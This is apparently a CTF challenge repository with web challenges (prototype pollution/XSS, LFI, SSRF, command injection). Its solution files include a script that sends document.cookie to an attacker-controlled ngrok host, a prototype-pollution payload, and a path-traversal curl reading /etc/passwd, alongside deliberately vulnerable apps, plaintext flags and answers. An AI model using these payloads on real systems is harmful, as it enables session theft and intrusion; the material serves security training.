Challenge creator! 10 | > It's still in early phase, so the code might look a little dirty. 11 | 12 | **Notes :** 13 | - Flag is stored in the admin's browser cookie 14 | - Use Chrome/Chromium as a browser for better experience 15 | 16 | **Author :** chenx3n 17 | 18 | connection_info: https://challenge-creator.challs.shellmates.club 19 | 20 | image: gcr.io/glowing-reserve-336013/challenge-creator 21 | 22 | tags: 23 | - extreme 24 | 25 | value: 1000 26 | type: dynamic 27 | 28 | extra: 29 | initial: 1000 30 | decay: 15 31 | minimum: 50 32 | 33 | flags: 34 | - shellmates{M4$t3r_of_cL1eNT_s1D3_hUsTL3s} 35 | 36 | state: visible 37 | 38 | version: "0.1" 39 | -------------------------------------------------------------------------------- /web/challenge-creator/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | web: 6 | build: 7 | context: . 8 | dockerfile: Dockerfile 9 | ports: 10 | - '1700:5000' 11 | deploy: 12 | replicas: 1 13 | restart_policy: 14 | condition: on-failure 15 | -------------------------------------------------------------------------------- /web/challenge-creator/solution/README.md: -------------------------------------------------------------------------------- 1 | # Challenge creator 2 | 3 | ## Write-up (TODO) 4 | 5 | ## Flag 6 | 7 | `shellmates{M4$t3r_of_cL1eNT_s1D3_hUsTL3s}` 8 | 9 | -------------------------------------------------------------------------------- /web/challenge-creator/solution/evil.js: -------------------------------------------------------------------------------- 1 | // Set your controlled website as URL 2 | let url = "https://xxxx.ngrok.io" 3 | let flag = encodeURIComponent(document.cookie) 4 | let el = document.createElement("script") 5 | el.src = `${url}/?flag=${flag}` 6 | document.body.appendChild(el) 7 | -------------------------------------------------------------------------------- /web/challenge-creator/solution/exploit.js: -------------------------------------------------------------------------------- 1 | // Set your controlled website as URL 2 | url = "https://xxxx.ngrok.io" 3 | name = JSON.stringify(`'`) 4 | proto = { 5 | tag: "script", 6 | attributes: { 7 | src: `${url}/evil.js`, 8 | }, 9 | classes: [] 10 | } 11 | payload = `{"name":${name},"value":100,"category":"web","__proto__":${JSON.stringify(proto)}}` 12 | console.log(payload) 13 | console.log("\n") 14 | console.log(encodeURIComponent(payload)) 15 | -------------------------------------------------------------------------------- /web/lfi/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.3-apache 2 | 3 | RUN apt-get update 4 | 5 | COPY ./challenge/* /var/www/html/ 6 | 7 | RUN echo "\nshellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}" >> /etc/passwd 8 | 9 | WORKDIR /var/www/html -------------------------------------------------------------------------------- /web/lfi/README.md: -------------------------------------------------------------------------------- 1 | # lfi 2 | 3 | **`Author:`** [Anis Chebah](https://github.com/) 4 | 5 | ## Description 6 | 7 | > We made some serious checks now, would you test it ? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /web/lfi/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "lfi" 2 | author: "Anis Chebah" 3 | 4 | category: web 5 | difficulty: easy 6 | 7 | description: | 8 | > We made some serious checks now, would you test it ? 9 | 10 | **Author :** Anis Chebah 11 | 12 | connection_info: https://lfi.challs.shellmates.club 13 | 14 | tags: 15 | - easy 16 | 17 | value: 500 18 | type: dynamic 19 | 20 | extra: 21 | initial: 500 22 | decay: 15 23 | minimum: 50 24 | 25 | flags: 26 | - shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3} 27 | 28 | state: visible 29 | 30 | version: "0.1" 31 | -------------------------------------------------------------------------------- /web/lfi/challenge/en.php: -------------------------------------------------------------------------------- 1 | <?php 2 | echo "<pre>Hello there, this is a basic example, just a proof of concept ;)</pre>" ; 3 | ?> -------------------------------------------------------------------------------- /web/lfi/challenge/fr.php: -------------------------------------------------------------------------------- 1 | <?php 2 | echo "<pre>Bonjour, ceci est un exemple de base, juste une preuve de concept ;)</pre>" ; 3 | ?> -------------------------------------------------------------------------------- /web/lfi/challenge/main.css: -------------------------------------------------------------------------------- 1 | h1 { 2 | text-align: center; 3 | } 4 | .token.atrule, 5 | .token.attr-value, 6 | .token.keyword { 7 | color: #81032d; 8 | } 9 | .token.property, 10 | .token.tag, 11 | .token.boolean, 12 | .token.number, 13 | .token.constant, 14 | .token.symbol, 15 | .token.deleted { 16 | color: #6a50eb; 17 | } 18 | .token.selector, 19 | .token.attr-name, 20 | .token.string, 21 | .token.char, 22 | .token.builtin, 23 | .token.inserted { 24 | color: #ff6d48; 25 | } 26 | .token.function { 27 | color: #007580; 28 | } 29 | .code-block { 30 | border: 2px solid #393c5563; 31 | border-radius: 4px; 32 | padding-top: 4px; 33 | padding-left: 4px; 34 | } 35 | -------------------------------------------------------------------------------- /web/lfi/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | web: 6 | build: 7 | context: . 8 | dockerfile: Dockerfile 9 | ports: 10 | - '8080:80' 11 | healthcheck: 12 | test: curl -I --fail http://localhost/ || exit 1 13 | interval: 60s 14 | timeout: 2s 15 | retries: 5 -------------------------------------------------------------------------------- /web/lfi/solution/README.md: -------------------------------------------------------------------------------- 1 | # lfi 2 | 3 | ## Write-up 4 | 5 | ```bash 6 | curl -v '[DOMAIN]?language=./languages/..././..././..././..././etc/passwd' 7 | ``` 8 | 9 | ## Flag 10 | 11 | `shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}` 12 | -------------------------------------------------------------------------------- /web/nextgen-1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt-get update && \ 4 | DEBIAN_FRONTEND=noninteractive apt-get install -y \ 5 | vim curl \ 6 | apache2 libapache2-mod-wsgi-py3 \ 7 | python3 python3-pip 8 | 9 | RUN pip3 install flask 10 | 11 | # TO-DO : use mod_wsgi from source code 12 | 13 | COPY challenge/apps/ /var/www/ 14 | 15 | COPY challenge/requirements.txt /var/www/ 16 | RUN pip install -r /var/www/requirements.txt 17 | 18 | COPY challenge/wsgi-apps.conf /etc/apache2/sites-available/ 19 | RUN a2ensite wsgi-apps && a2dissite 000-default 20 | 21 | COPY challenge/flag.txt /flag.txt 22 | RUN chmod 644 /flag.txt 23 | 24 | CMD echo "127.0.0.1 hr.dep.nextgen.org acc.dep.nextgen.org">>/etc/hosts && apachectl -D FOREGROUND 25 | -------------------------------------------------------------------------------- /web/nextgen-1/README.md: -------------------------------------------------------------------------------- 1 | # nextGen 1 2 | 3 | **`Author:`** [souad](https://github.com/SouadSEBAA) 4 | 5 | ## Description 6 | 7 | > Simple monitoring app. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /web/nextgen-1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "nextGen 1" 2 | author: "souad" 3 | 4 | category: web 5 | difficulty: easy 6 | 7 | description: | 8 | > Simple monitoring app. 9 | 10 | **Note** : Flag is in the `/flag.txt` file of the web server 11 | 12 | **Author** : souad 13 | 14 | connection_info: https://nextgen-1.challs.shellmates.club 15 | 16 | tags: 17 | - easy/medium 18 | 19 | value: 500 20 | type: dynamic 21 | 22 | extra: 23 | initial: 500 24 | decay: 8 25 | minimum: 50 26 | 27 | flags: 28 | - shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$Rf} 29 | 30 | state: visible 31 | 32 | version: "0.1" 33 | -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/main-app/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, render_template 2 | from urllib.request import urlopen 3 | 4 | # acc -> accounting 5 | # hr -> human resources 6 | 7 | ACCOUNTING_DEP_LINK = "http://acc.dep.nextgen.org" 8 | HR_DEP_LINK = "http://hr.dep.nextgen.org" 9 | 10 | 11 | app = Flask(__name__) 12 | 13 | @app.route("/") 14 | def hello_world(): 15 | return render_template('index.html', accLink=ACCOUNTING_DEP_LINK, hrLink=HR_DEP_LINK) 16 | 17 | @app.route("/request", methods=['POST']) 18 | def serve(): 19 | with urlopen(request.form['service']) as response: 20 | html = response.read() 21 | return html 22 | 23 | @app.errorhandler(404) 24 | def not_found(e): 25 | return render_template("error-404.html"), 404 26 | 27 | @app.errorhandler(500) 28 | def server_error(e): 29 | return render_template("error-500.html"), 500 30 | -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/main-app/app.wsgi: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python3 2 | 3 | import logging 4 | import sys 5 | 6 | logging.basicConfig(stream = sys.stderr) 7 | sys.path.insert(0, '/var/www/main-app') 8 | 9 | from app import app as application -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/main-app/static/js/main.js: -------------------------------------------------------------------------------- 1 | function myFunc(eventObj) { 2 | var xhttp = new XMLHttpRequest(); 3 | xhttp.onreadystatechange = function () { 4 | if (this.readyState == 4 && this.status == 200) { 5 | document.getElementById("content").innerHTML = xhttp.responseText; 6 | } 7 | }; 8 | xhttp.open("POST", '/request'); 9 | xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 10 | xhttp.send("service=" + this.attributes.link.value); 11 | 12 | } 13 | 14 | var dep = document.getElementsByClassName('department'); 15 | for (var i = 0; i < dep.length; i++) { 16 | dep[i].addEventListener('click', myFunc); 17 | } -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/main-app/templates/base.html: -------------------------------------------------------------------------------- 1 | <!DOCTYPE html> 2 | <html lang="en"> 3 | 4 | <head> 5 | <meta charset="utf-8" /> 6 | <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> 7 | 8 | <title> 9 | nextGen 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | {% block navbar %}{% endblock navbar %} 21 | {% block content %}{% endblock content %} 22 | 23 |
24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/main-app/templates/error-404.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 |
5 |

Page not found

6 |
7 | {% endblock %} -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/main-app/templates/error-500.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 |
5 |

Internal Server Error

6 |
7 | {% endblock %} -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/main-app/templates/index.html: -------------------------------------------------------------------------------- 1 | {% include "navigation.html" %} 2 | 3 | {% block content %} 4 |
5 | 6 |
7 |

This is only first version of a control panel we want to develop to monitor company's departments. 8 |

9 |
10 |
11 | 12 | 13 | 14 | 15 | {% endblock %} -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/main-app/templates/navigation.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block navbar %} 4 |
5 | 20 |

21 |
22 | {% endblock %} -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/service1/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, render_template 2 | 3 | app = Flask(__name__) 4 | 5 | # Accounting department 6 | 7 | @app.route("/overview") 8 | def overview(): 9 | return render_template('summary.html') 10 | -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/service1/app.wsgi: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python3 2 | 3 | import logging 4 | import sys 5 | logging.basicConfig(stream=sys.stderr) 6 | sys.path.insert(0, '/var/www/service1') 7 | from app import app as application -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/service2/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, render_template 2 | 3 | app = Flask(__name__) 4 | 5 | # Human resources department 6 | @app.route("/overview") 7 | def overview(): 8 | return render_template('summary.html') 9 | -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/service2/app.wsgi: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python3 2 | 3 | import logging 4 | import sys 5 | logging.basicConfig(stream=sys.stderr) 6 | sys.path.insert(0, '/var/www/service2') 7 | from app import app as application -------------------------------------------------------------------------------- /web/nextgen-1/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$Rf} -------------------------------------------------------------------------------- /web/nextgen-1/challenge/requirements.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/challenge/requirements.txt -------------------------------------------------------------------------------- /web/nextgen-1/challenge/wsgi-apps.conf: -------------------------------------------------------------------------------- 1 | 2 | ServerName acc.dep.nextgen.org 3 | WSGIScriptAlias / /var/www/service1/app.wsgi 4 | 5 | Require all granted 6 | 7 | 8 | 9 | 10 | ServerName hr.dep.nextgen.org 11 | WSGIScriptAlias / /var/www/service2/app.wsgi 12 | 13 | Require all granted 14 | 15 | 16 | 17 | 18 | 19 | WSGIScriptAlias / /var/www/main-app/app.wsgi 20 | 21 | Require all granted 22 | 23 | 24 | -------------------------------------------------------------------------------- /web/nextgen-1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.9' 2 | services: 3 | app: 4 | build: . 5 | ports: 6 | - "8080:80" 7 | 8 | -------------------------------------------------------------------------------- /web/nextgen-1/solution/images/cap1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/solution/images/cap1.png -------------------------------------------------------------------------------- /web/nextgen-1/solution/images/cap2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/solution/images/cap2.png -------------------------------------------------------------------------------- /web/nextgen-1/solution/images/cap3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/solution/images/cap3.png -------------------------------------------------------------------------------- /web/nextgen-1/solution/images/cap4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/solution/images/cap4.png -------------------------------------------------------------------------------- /web/nextgen-1/solution/images/cap5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/solution/images/cap5.png -------------------------------------------------------------------------------- /web/nextgen-1/solution/images/cap6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/solution/images/cap6.png -------------------------------------------------------------------------------- /web/nextgen-2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt update && \ 4 | DEBIAN_FRONTEND=noninteractive apt install -y \ 5 | vim curl \ 6 | apache2 libapache2-mod-wsgi-py3 \ 7 | python3 python3-pip 8 | 9 | RUN pip3 install flask 10 | 11 | # TO-DO : use mod_wsgi from source code 12 | 13 | COPY challenge/apps/ /var/www/ 14 | 15 | COPY challenge/requirements.txt /var/www/ 16 | RUN pip install -r /var/www/requirements.txt 17 | 18 | COPY challenge/wsgi-apps.conf /etc/apache2/sites-available/ 19 | RUN a2ensite wsgi-apps && a2dissite 000-default 20 | 21 | COPY challenge/flag.txt /flag.txt 22 | RUN chmod 644 /flag.txt 23 | 24 | CMD echo "127.0.0.1 hr.dep.nextgen.org acc.dep.nextgen.org">>/etc/hosts && apachectl -D FOREGROUND -------------------------------------------------------------------------------- /web/nextgen-2/README.md: -------------------------------------------------------------------------------- 1 | # nextGen 2 2 | 3 | **`Author:`** [souad](https://github.com/SouadSEBAA) 4 | 5 | ## Description 6 | 7 | > We added some filters now. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /web/nextgen-2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "nextGen 2" 2 | author: "souad" 3 | 4 | category: web 5 | difficulty: medium 6 | 7 | description: | 8 | > We added some filters now. 9 | 10 | **Note** : Flag is in the `/flag.txt` file of the web server 11 | 12 | **Author** : souad 13 | 14 | 15 | connection_info: https://nextgen-2.challs.shellmates.club 16 | files: 17 | - challenge/filters 18 | 19 | tags: 20 | - medium 21 | 22 | value: 500 23 | type: dynamic 24 | 25 | extra: 26 | initial: 500 27 | decay: 8 28 | minimum: 50 29 | 30 | flags: 31 | - shellmates{Y0u_d1D_1t_aG4iN_!!} 32 | 33 | state: visible 34 | 35 | version: "0.1" 36 | -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/main-app/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, render_template 2 | from urllib.request import urlopen 3 | from re import search 4 | 5 | ACCOUNTING_DEP_LINK = "http://acc.dep.nextgen.org" 6 | HR_DEP_LINK = "http://hr.dep.nextgen.org" 7 | 8 | app = Flask(__name__) 9 | 10 | @app.route("/") 11 | def hello_world(): 12 | return render_template('index.html', accLink=ACCOUNTING_DEP_LINK, hrLink=HR_DEP_LINK) 13 | 14 | @app.route("/request", methods=['POST']) 15 | def serve(): 16 | url = request.form['service'] 17 | html = '' 18 | if search(r'(localhost|127.0.0.1|0.0.0.0)', url) : 19 | html = render_template("error-404.html") 20 | else : 21 | if search(r'[a-z]+://[a-z0-9.-]+/', url): 22 | with urlopen(url) as response: 23 | html = response.read() 24 | 25 | return html 26 | 27 | @app.errorhandler(404) 28 | def not_found(e): 29 | return render_template("error-404.html"), 404 30 | 31 | @app.errorhandler(500) 32 | def server_error(e): 33 | return render_template("error-500.html"), 500 34 | -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/main-app/app.wsgi: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python3 2 | 3 | import logging 4 | import sys 5 | 6 | logging.basicConfig(stream = sys.stderr) 7 | sys.path.insert(0, '/var/www/main-app') 8 | 9 | from app import app as application -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/main-app/static/js/main.js: -------------------------------------------------------------------------------- 1 | function myFunc(eventObj) { 2 | var xhttp = new XMLHttpRequest(); 3 | xhttp.onreadystatechange = function () { 4 | if (this.readyState == 4 && this.status == 200) { 5 | document.getElementById("content").innerHTML = xhttp.responseText; 6 | } 7 | }; 8 | xhttp.open("POST", '/request'); 9 | xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 10 | xhttp.send("service=" + this.attributes.link.value); 11 | 12 | } 13 | 14 | var dep = document.getElementsByClassName('department'); 15 | for (var i = 0; i < dep.length; i++) { 16 | dep[i].addEventListener('click', myFunc); 17 | } -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/main-app/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | nextGen 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | {% block navbar %}{% endblock navbar %} 21 | {% block content %}{% endblock content %} 22 | 23 |
24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/main-app/templates/error-404.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 |
5 |

Page not found

6 |
7 | {% endblock %} -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/main-app/templates/error-500.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 |
5 |

Internal Server Error

6 |
7 | {% endblock %} -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/main-app/templates/index.html: -------------------------------------------------------------------------------- 1 | {% include "navigation.html" %} 2 | 3 | {% block content %} 4 |
5 | 6 |
7 |

This is only first version of a control panel we want to develop to monitor company's departments. 8 |

9 |
10 |
11 | 12 | 13 | 14 | 15 | {% endblock %} -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/main-app/templates/navigation.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block navbar %} 4 |
5 | 20 |

21 |
22 | {% endblock %} -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/service1/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, render_template 2 | 3 | app = Flask(__name__) 4 | 5 | # Accounting department 6 | 7 | @app.route("/overview") 8 | def overview(): 9 | return render_template('summary.html') 10 | -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/service1/app.wsgi: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python3 2 | 3 | import logging 4 | import sys 5 | logging.basicConfig(stream=sys.stderr) 6 | sys.path.insert(0, '/var/www/service1') 7 | from app import app as application -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/service2/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, render_template 2 | 3 | app = Flask(__name__) 4 | 5 | # Human resources department 6 | @app.route("/overview") 7 | def overview(): 8 | return render_template('summary.html') 9 | -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/service2/app.wsgi: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python3 2 | 3 | import logging 4 | import sys 5 | logging.basicConfig(stream=sys.stderr) 6 | sys.path.insert(0, '/var/www/service2') 7 | from app import app as application -------------------------------------------------------------------------------- /web/nextgen-2/challenge/filters: -------------------------------------------------------------------------------- 1 | @app.route("/request", methods=['POST']) 2 | def serve(): 3 | url = request.form['service'] 4 | html = '' 5 | if search(r'(localhost|127.0.0.1|0.0.0.0)', url) : 6 | html = render_template("error-404.html") 7 | else : 8 | if search(r'[a-z]+://[a-z0-9.-]+/', url): 9 | with urlopen(url) as response: 10 | html = response.read() 11 | 12 | return html -------------------------------------------------------------------------------- /web/nextgen-2/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{Y0u_d1D_1t_aG4iN_!!} -------------------------------------------------------------------------------- /web/nextgen-2/challenge/requirements.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-2/challenge/requirements.txt -------------------------------------------------------------------------------- /web/nextgen-2/challenge/wsgi-apps.conf: -------------------------------------------------------------------------------- 1 | 2 | ServerName acc.dep.nextgen.org 3 | WSGIScriptAlias / /var/www/service1/app.wsgi 4 | 5 | Require all granted 6 | 7 | 8 | 9 | 10 | ServerName hr.dep.nextgen.org 11 | WSGIScriptAlias / /var/www/service2/app.wsgi 12 | 13 | Require all granted 14 | 15 | 16 | 17 | 18 | 19 | WSGIScriptAlias / /var/www/main-app/app.wsgi 20 | 21 | Require all granted 22 | 23 | 24 | -------------------------------------------------------------------------------- /web/nextgen-2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.9' 2 | services: 3 | app: 4 | build: . 5 | ports: 6 | - "8080:80" 7 | -------------------------------------------------------------------------------- /web/nextgen-2/solution/images/cap1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-2/solution/images/cap1.png -------------------------------------------------------------------------------- /web/whois-fixed/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.3-apache 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get -y --no-install-recommends install whois netbase 5 | 6 | COPY challenge/ /var/www/html/ 7 | 8 | COPY flag.txt /var/www/html/thisistheflagwithrandomstuffthatyouwontguessJUSTCATME 9 | 10 | WORKDIR /var/www/html 11 | 12 | RUN chown -R root:root /var/www/html 13 | RUN chmod 444 thisistheflagwithrandomstuffthatyouwontguessJUSTCATME -------------------------------------------------------------------------------- /web/whois-fixed/README.md: -------------------------------------------------------------------------------- 1 | # Whois 2 | 3 | **`Author:`** [souad](https://github.com/SouadSEBAA) 4 | 5 | ## Description 6 | 7 | > A web-based Whois service. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /web/whois-fixed/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Whois fixed" 2 | author: "souad" 3 | author_link: "https://github.com/SouadSEBAA" 4 | 5 | category: web 6 | difficulty: medium 7 | 8 | description: | 9 | > A web-based Whois service 10 | > **Note** : There was a problem with the first version, this is the fixed version. 11 | **Author :** souad 12 | 13 | connection_info: https://whois-fixed.challs.shellmates.club 14 | 15 | tags: 16 | - medium 17 | 18 | value: 500 19 | type: dynamic 20 | 21 | extra: 22 | initial: 500 23 | decay: 15 24 | minimum: 50 25 | 26 | flags: 27 | - shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} 28 | 29 | hints: 30 | - "The source code of query.php is available in /query.php endpoint. \nRead about anchors in regex syntax in PHP, the goal is to send an input that can pass the regex but still can make an injection" 31 | 32 | state: visible 33 | 34 | version: "0.1" 35 | -------------------------------------------------------------------------------- /web/whois-fixed/challenge/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Whois 5 | 6 | 7 |
8 |

Welcome to this web-based Whois service

9 |
10 |
11 | 16 | 17 |
18 |
19 |
20 | 21 |
22 |
23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /web/whois-fixed/challenge/query.php: -------------------------------------------------------------------------------- 1 | 29 | 30 | 31 | 32 | 33 | Whois 34 | 35 | 36 |
37 | 38 | 39 | -------------------------------------------------------------------------------- /web/whois-fixed/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | web: 6 | build: 7 | context: . 8 | dockerfile: Dockerfile 9 | ports: 10 | - '1702:80' 11 | deploy: 12 | replicas: 1 13 | restart_policy: 14 | condition: on-failure 15 | resources: 16 | limits: 17 | cpus: '0.5' 18 | memory: 150M 19 | healthcheck: 20 | test: curl -I --fail http://localhost/ || exit 1 21 | interval: 60s 22 | timeout: 2s 23 | retries: 5 24 | -------------------------------------------------------------------------------- /web/whois-fixed/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} -------------------------------------------------------------------------------- /web/whois-fixed/solution/payload_test_capture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/whois-fixed/solution/payload_test_capture.png -------------------------------------------------------------------------------- /web/whois-fixed/solution/php_doc_capture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/whois-fixed/solution/php_doc_capture.png -------------------------------------------------------------------------------- /web/whois-fixed/solution/php_test_capture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/whois-fixed/solution/php_test_capture.png -------------------------------------------------------------------------------- /web/whois/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.3-apache 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get -y --no-install-recommends install whois netbase 5 | 6 | COPY challenge/ /var/www/html/ 7 | 8 | COPY flag.txt /var/www/html/ 9 | 10 | WORKDIR /var/www/html 11 | 12 | RUN chown -R root:root /var/www/html 13 | RUN chmod 444 flag.txt -------------------------------------------------------------------------------- /web/whois/README.md: -------------------------------------------------------------------------------- 1 | # Whois 2 | 3 | **`Author:`** [souad](https://github.com/SouadSEBAA) 4 | 5 | ## Description 6 | 7 | > A web-based Whois service. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /web/whois/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Whois" 2 | author: "souad" 3 | author_link: "https://github.com/SouadSEBAA" 4 | 5 | category: web 6 | difficulty: medium 7 | 8 | description: | 9 | > A web-based Whois service 10 | 11 | **Author :** souad 12 | 13 | connection_info: https://whois.challs.shellmates.club 14 | 15 | tags: 16 | - medium 17 | 18 | value: 500 19 | type: dynamic 20 | 21 | extra: 22 | initial: 500 23 | decay: 15 24 | minimum: 50 25 | 26 | flags: 27 | - shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll} 28 | 29 | hints: 30 | - "The source code of query.php is available in /query.php endpoint. \nRead about anchors in regex syntax in PHP, the goal is to send an input that can pass the regex but still can make an injection" 31 | 32 | state: visible 33 | 34 | version: "0.1" 35 | -------------------------------------------------------------------------------- /web/whois/challenge/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Whois 5 | 6 | 7 |
8 |

Welcome to this web-based Whois service

9 |
10 |
11 | 16 | 17 |
18 |
19 |
20 | 21 |
22 |
23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /web/whois/challenge/query.php: -------------------------------------------------------------------------------- 1 | 29 | 30 | 31 | 32 | 33 | Whois 34 | 35 | 36 |
